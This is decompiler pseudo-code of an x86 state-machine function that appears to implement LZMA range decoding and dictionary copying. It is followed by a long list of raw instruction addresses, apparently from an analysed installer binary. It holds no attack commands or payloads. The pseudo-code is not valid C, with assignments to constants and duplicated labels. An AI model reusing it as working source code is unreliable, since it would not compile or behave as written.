												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                            0x00000000
                                                                                                            0x004063d0
                                                                                                            0x004063d0
                                                                                                            0x004063d4
                                                                                                            0x004063f5
                                                                                                            0x004063fc
                                                                                                            0x00406402
                                                                                                            0x00406408
                                                                                                            0x0040641a
                                                                                                            0x00406420
                                                                                                            0x00406425
                                                                                                            0x00000000
                                                                                                            0x004063d6
                                                                                                            0x004063dc
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067ee
                                                                                                            0x004067f2
                                                                                                            0x004069a1
                                                                                                            0x004069b7
                                                                                                            0x004069bf
                                                                                                            0x004069c6
                                                                                                            0x004069c8
                                                                                                            0x004069cf
                                                                                                            0x004069d3
                                                                                                            0x004069d3
                                                                                                            0x004067fe
                                                                                                            0x00406805
                                                                                                            0x0040680d
                                                                                                            0x00406810
                                                                                                            0x00406813
                                                                                                            0x00406813
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x00000000
                                                                                                            0x00405fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fd8
                                                                                                            0x00405fdb
                                                                                                            0x00405fde
                                                                                                            0x00405fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fe8
                                                                                                            0x00405feb
                                                                                                            0x00405fed
                                                                                                            0x00405fee
                                                                                                            0x00405ff1
                                                                                                            0x00405ff3
                                                                                                            0x00405ff4
                                                                                                            0x00405ff6
                                                                                                            0x00405ff9
                                                                                                            0x00405ffe
                                                                                                            0x00406003
                                                                                                            0x0040600c
                                                                                                            0x0040601f
                                                                                                            0x00406022
                                                                                                            0x0040602e
                                                                                                            0x00406056
                                                                                                            0x00406058
                                                                                                            0x00406066
                                                                                                            0x00406066
                                                                                                            0x0040606a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x0040605a
                                                                                                            0x0040605d
                                                                                                            0x0040605e
                                                                                                            0x0040605e
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x00406034
                                                                                                            0x00406039
                                                                                                            0x00406039
                                                                                                            0x00406042
                                                                                                            0x0040604a
                                                                                                            0x0040604d
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406070
                                                                                                            0x00406070
                                                                                                            0x00406074
                                                                                                            0x00406920
                                                                                                            0x00000000
                                                                                                            0x00406920
                                                                                                            0x0040607d
                                                                                                            0x0040608d
                                                                                                            0x00406090
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406096
                                                                                                            0x0040609a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040609c
                                                                                                            0x004060a2
                                                                                                            0x004060cc
                                                                                                            0x004060d2
                                                                                                            0x004060d9
                                                                                                            0x00000000
                                                                                                            0x004060d9
                                                                                                            0x004060a8
                                                                                                            0x004060ab
                                                                                                            0x004060b0
                                                                                                            0x004060b0
                                                                                                            0x004060bb
                                                                                                            0x004060c3
                                                                                                            0x004060c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040610b
                                                                                                            0x00406111
                                                                                                            0x00406114
                                                                                                            0x00406121
                                                                                                            0x00406129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004060e0
                                                                                                            0x004060e0
                                                                                                            0x004060e4
                                                                                                            0x0040692f
                                                                                                            0x00000000
                                                                                                            0x0040692f
                                                                                                            0x004060f0
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fe
                                                                                                            0x00406101
                                                                                                            0x00406104
                                                                                                            0x00406109
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406131
                                                                                                            0x00406133
                                                                                                            0x00406136
                                                                                                            0x004061a7
                                                                                                            0x004061aa
                                                                                                            0x004061ad
                                                                                                            0x004061b4
                                                                                                            0x004061be
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x00406138
                                                                                                            0x0040613c
                                                                                                            0x0040613f
                                                                                                            0x00406141
                                                                                                            0x00406144
                                                                                                            0x00406147
                                                                                                            0x00406149
                                                                                                            0x0040614c
                                                                                                            0x0040614e
                                                                                                            0x00406153
                                                                                                            0x00406156
                                                                                                            0x00406159
                                                                                                            0x0040615d
                                                                                                            0x00406164
                                                                                                            0x00406167
                                                                                                            0x0040616e
                                                                                                            0x00406172
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x0040617e
                                                                                                            0x00406181
                                                                                                            0x0040619f
                                                                                                            0x004061a1
                                                                                                            0x00000000
                                                                                                            0x00406183
                                                                                                            0x00406183
                                                                                                            0x00406186
                                                                                                            0x00406189
                                                                                                            0x0040618c
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x00406191
